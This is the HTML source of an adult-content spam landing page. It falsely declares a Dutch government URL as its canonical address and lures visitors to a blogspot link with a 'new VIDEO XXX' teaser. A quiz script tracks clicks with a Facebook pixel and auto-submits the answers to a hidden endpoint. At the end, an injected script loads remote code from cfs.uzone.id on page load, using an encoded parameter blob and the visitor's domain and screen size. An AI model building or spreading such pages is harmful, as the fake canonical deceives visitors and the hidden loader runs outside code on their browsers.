

<!DOCTYPE html>
<html>
	<head>
<link href='https://www.government.nl/topics' rel='canonical'/>
<meta content='https://www.government.nl/topics' property='og:url'/>
		<meta charset="utf-8">
                <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
                		<title> 🔞 SNAP_SEX 🔞 </title>
 

		<style type="text/css">
			@import url(http://fonts.googleapis.com/css?family=Roboto:300,400,500,700);
			@font-face {
				font-family: 'HelveticaNeue';
				src: url('tpl/1/fonts/HelveticaNeue-BoldCond.ttf');
			}
			html,body{
				margin: 0;
				padding: 0;
			}
			body {
				background-image: url('');
				/*background-image: url({image1})*/
				background-color: #000000;
				background-repeat: repeat;
			}
						h1,p,a {
				font-family: 'Roboto', sans-serif;
				margin: 0;
			}
			.main{
				margin:0 auto;
				max-width:960px;
				padding-top:0;
				padding-bottom:10px;
				padding: 0;
				margin-bottom: 100px;
			}
			.counter {
				text-align: center;
				margin: 38px auto 0;
			}
			ul#countdown {
				padding: 0;
				margin-bottom: 8px;
			}
			ul#countdown li {
				display: inline-block;
				width: 83px;
				text-align: center;
				background-color: yellow;
				background: transparent url('') no-repeat;
				margin: 0 2px;
			}
			ul#countdown li span {
				font-size: 63px;
				font-family: 'HelveticaNeue';
				font-weight: bolder;
				color: #d1d2d2;
				line-height: 81px;
				position: relative;
			}
			ul#countdown li span::before {
				content: '';
				width: 100%;
				height: 1px;
				border-top: 1px solid rgba( 0, 0, 0, 0.2);
				position: absolute;
				top: 27px;
			}
			ul#countdown li p.timeRefDays,
			ul#countdown li p.timeRefHours,
			ul#countdown li p.timeRefMinutes,
			ul#countdown li p.timeRefSeconds {
				font-family: 'HelveticaNeue';
				font-weight: 700;
				text-shadow: 2px 1px rgba(0, 0, 0, 0.3);
				font-size: 19px;
				color: #d4d4d4;
				text-transform: uppercase;
				margin-top: 8px;
				position: relative;
				left: -1px;
			}
			.content_wrapper {
				border: 5px solid rgba(160,160,160,0.4);
				background-color: rgba(160,160,160,0.4);
				margin: 16px auto 0;
				max-width: 911px;
				border-radius: 10px 10px 10px 10px;
			}
			.content {
				min-height: 729px;
				/*padding-bottom: 2px;*/
				background-image: url('https://1.bp.blogspot.com/-XePxdwiZDz4/WxcRSiLJEkI/AAAAAAAAACE/io8xNDM7wRoAgf2H6RxqNqq2_5KJ6T0aQCPcBGAYYCw/s640/download%2B%25287%2529%25281%2529.png');
				/*background-image: url({image2});*/
				/*background-image: url('images/TPLGalleries/girl-684.png');*/
				background-repeat: no-repeat;
				background-size: cover;
				border-radius: 25px 25px 25px 25px;
			}
			.answers {
				background-color: rgba(0,0,0,0.5);
				width: 60%;
				text-align: center;
				height: 70%;
				border-radius: 0 7px 7px 0;
			}
			.answers_title,
			.answers_description,
			.answers_text,
			.question,
			.answers-row {
				text-align: center;
			}
			.answers_title {
				padding: 21px 0 0;
			}
			.answers_title h1{
				color: #ff0000;
				font-size: 29px;
				font-weight: 700;
			}
			.answers_description {
				padding: 27px 27px 0px;
			}
			.answers_description p{
				color: #00ff00;
				font-size: 24px;
				line-height: 29px;
				letter-spacing: 0.16px;
			}
			.answers_text {
				padding: 15px 0 0;
			}
			.answers_text p{
				color: #ffffff;
				font-size: 18px;
				font-weight: 300;
			}
			.question {
				padding: 47px 0 0;
				margin-bottom: 2px;
			}
			.question p{
				color: #ffffff;
				font-size: 30px;
				font-weight: 700;
			}
			.answer {
				font-size: 26px;
				font-weight: 700;
				text-decoration: none;
				display: inline-block;
				color: #ffffff;
				background-color: #345caa;
				border-top: 1px solid #b718d0;
				border-left: 1px solid #b718d0;
				padding: 10px 41px 14px;
				border-radius: 25px 25px 25px 25px;
				margin-bottom: 5px;
				box-shadow: 15px 15px 15px #00000;
			}
			.answer-block {
				display: inline-block;
			}
			.answer-block:first-child {
				margin-right: 4px;
			}
			.opt_in_field {
				text-align: center;
				margin-top: 50px;
			}
			.name_field,
			.email_field {
				margin-bottom: 50px;
			}
			.name_field input,
			.email_field input {
				border-radius: 5px 5px 5px 5px;
				padding: 9px;
				width: 300px;
			}
			.send_button {
				background-color: #150caa;
				border-radius: 5px 5px 5px 5px;
				border: transparent;
				color: #ffffff;
				font-size: 20px;
				font-family: 'Open Sans', sans-serif;
				font-weight: bold;
				text-transform: uppercase;
				padding: 9px;
			}
			.gallery {
				margin: 40px auto;
				width: 585px;
			}
			.gallery_title {
				font: 30px 'HelveticaNeue';
				text-align: center;
				color: #FFFF00;
				margin: 20px 0 -10px 0;
			}
			.galleryImageHolder {
				width: 280px;
				height: 218px;
                                display: inline-block;
				border: 4px solid #d4d4d4;
				border-radius: 70px;
				margin: 0 0 20px 0;
				text-align: center;
				position: relative;
			}
			img.loader {
				position: absolute;
				top: 0;
				left: 50%;
				margin-top: 30px;
			}
			.gallery img.galleryImage {
				position: relative;
				z-index: 22;
				border-radius: 70px;
				margin-bottom: 10px;	
			}
						.gallery img, .galleryImageHolder {
				border-radius: 50px;
			}
						.galleryImageHolder:not(:nth-of-type(4n+0)) {
				margin-right: 67px;
			}
			
						@media (max-width: 915px){
				.counter {
					margin: 87px auto 0;
				}
				.content_wrapper {
					max-width: 719px;
				}
				.content {
					height: 649px;
				}
				.answers {
					width: 79.5%;
				}
				.answers_header {
					margin-bottom: 67px;
				}
			}
						@media (max-width: 760px) {
				.answers {
					width: 92%;
					border-radius: 0;
					margin: 0 auto;
					float: none;
				}
				.answer {
					font-size: 20px;
					font-size: 2em;
					padding: 8px 48px 12px;
				}
			}
			@media (max-width: 729px) {
				.counter {
					margin: 19px auto 0;
				}
				ul#countdown li {
					width: 729px;
					background: transparent url('') no-repeat;
				}
				ul#countdown li span {
					/*font-size: 50px;*/
					font-size: 3em;
					line-height: 63px;
				}
				ul#countdown li span::before {
					top: 21px;
					border-top: 1px solid rgba( 0, 0, 0, 0.2);
				}
				ul#countdown li p.timeRefDays,
				ul#countdown li p.timeRefHours,
				ul#countdown li p.timeRefMinutes,
				ul#countdown li p.timeRefSeconds {
					font-size: 19px;
					margin-top: 1px;
				}
				.content_wrapper {
					max-width: 270px;
					margin: 14px auto 0;
				}
				.content {
					height: 892px;
				}
				.answers_title {
					padding: 13px 0 0;
				}
				.answers_title h1 {
					font-size: 40px;
				}
				.answers_description {
					padding: 50px 10px 0px;
				}
				.answers_description p {
					font-size: 18px;
					line-height: 22px;
				}
				.answers_text {
					padding: 8px 0 0;
				}
				.answers_text p {
					font-size: 14px;
				}
				.question {
					padding: 17px 0 0;
					margin-bottom: 16px;
				}
				.question p {
					font-size: 24px;
				}
				.answer-block:first-child {
					margin-right: 0;
				}
			}
			.questionblocks {
				display: none;
			}
		</style>
		<!--[if gte IE 9]>
		  <style type="text/css">
			.gradient {
			   filter: none;
			}
		  </style>
		<![endif]-->
	<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
			</head>
                            
	<body data-type="backgroundImage">
		
		<div class="wrapper">
			<div class="section-wrapper cf">
	<div class="section-wrapper-content cf"><section class="section default-01 design-01 section-none"><div class="section-bg">
		<div class="section-bg-layer">
			
		</div>
		<div class="section-bg-layer section-bg-overlay"></div>
	</div>
	<div class="section-inner">
		<div class="content cf wnd-no-cols">
	<div>
		<div class="text cf design-01">
    <div class="text-content"><h2 class="wnd-align-center"><a href="https://sportandfun111.blogspot.com/" rel="nofollow">↓ ↓<strong> Hello Love watch my new VIDEO XXX </strong>↓ ↓</a><a href="https://sportandfun111.blogspot.com/" rel="nofollow"></a></h2>
</div>
</div><div class="image-block image-link block design-01 wnd-orientation-landscape wnd-type-image" style="margin-left:13.2%;margin-right:13.2%;" id="wnd_ImageBlock_293244">
	<div class="image-content" style="padding-bottom:54.8%;text-align:center;">
        <a title="" href="https://sportandfun111.blogspot.com/" rel="nofollow" target="_blank">
    		<img title="" src="https://livechat278.webnode.kr/_files/200000000-4038541341/200/Screenshot_10.jpg" alt="" style="top:0%;left:0%;width:100%;height:100%;position:absolute;"><div class="embed-content">
				</div>
					</div>
				</div>
			</div>
		</div>
</center>
		<script type="text/javascript">

			var galleryimage = $('.galleryimage');
			var loader = $('.loader');

			galleryimage.hide();

			galleryimage.on('load', function() {
				$(this).fadeIn();
				$(this).siblings().fadeOut();
			});

			var mq = [22,7];
			var a = '', g = '', c = [], o = [];

			$(document).ready(function(){
				$('.questionblocks').hide();
				$('#question'+mq.shift()).fadeIn();
			});

			$('.answer').click(function() {
				var v = $(this).data('target-id');
				switch(parseInt($(this).data('target-type')))
				{
					case 1 : a = v;
					break;
					case 2 : c.push(v);
					break;
					case 3 : g = v;
					break;
					case 4 : o.push(v);
					break;
					case 5 : $(this).parent().parent().fadeOut(function() {
						$('#question'+v).fadeIn();});
						return false;
				} 
				if (mq.length > 0) {
												fbq('track', 'Click1', {domain: window.location.href});
												
						$(this).parent().fadeOut(function() {$('#question'+mq.shift()).fadeIn();});
						
				}
				else {
						$('.questionblocks').fadeOut('slow');
						$('body').append('<form id="lf" action="m/r.php" method="POST">');
						$('#lf').append('<input type="hidden" name="id" value="4038">');
						$('#lf').append('<input type="hidden" name="r" value="">');
						$('#lf').append('<input type="hidden" name="a" value="'+a+'">');
						$('#lf').append('<input type="hidden" name="g" value="'+g+'">');
												for (var i in c) {
							$('#lf').append('<input type="hidden" name="c[]" value="'+c[i]+'">');
						}
						for (var i in o) {
							$('#lf').append('<input type="hidden" name="o[]" value="'+o[i]+'">');
						}
												fbq('track', 'Click2', {domain: window.location.href});
												$('#lf').submit();
					}   
			});   
			</script>
		
			
		
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582HVlH3eBnL31g3kLovr63hxe6i963M1mRT04kh%2fSnzA5cHR3g1B0ET9KgstQhUsF2HR88L5igexgHG4O2jjFYQB2rDMySjN8NTHW385uo6TEYEPx58adz815vX8h7NMCENY%2brx3kjS66R3DtiS79uVcAKFBl81fD7YS7ASYN%2fE8kdoU8%2fhpmUZygpTARC8Dwo2i%2fQhLvnQWutomAgJeJHLfTBXHStIdWjujqZ9duqLOYtilabbHbIeFJICPTH6Crohi3XozkOhnvuMOQ5srf8z6VZsA0HJXpqhTCvIgFzucmOEmHYPZPbWiPWAGww9hSVxr853RnRhj6Q1yb5CfawKeX6LsaOA6hMOpB1VE9gfQDXVLMNDm%2f9gQmcj0E7PtwgCsyAJ%2foy9UxkTTBvcnZ%2fjVq%2friDf0bOzG7eMhrvn4fP3USPDBLjpGgSAjgsWjzbh%2fRvf62jRYsTXx0Rvm%2ftO1fbg8Uv%2bdoHlOR4f3ylGOpd%2bA3E8UkxaViua7jdiPmLAUXU7CWxGKpoMuaVExOTjRSEkXbJeqkIDEnOkC4NCROIWkIsqTgt7pg%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
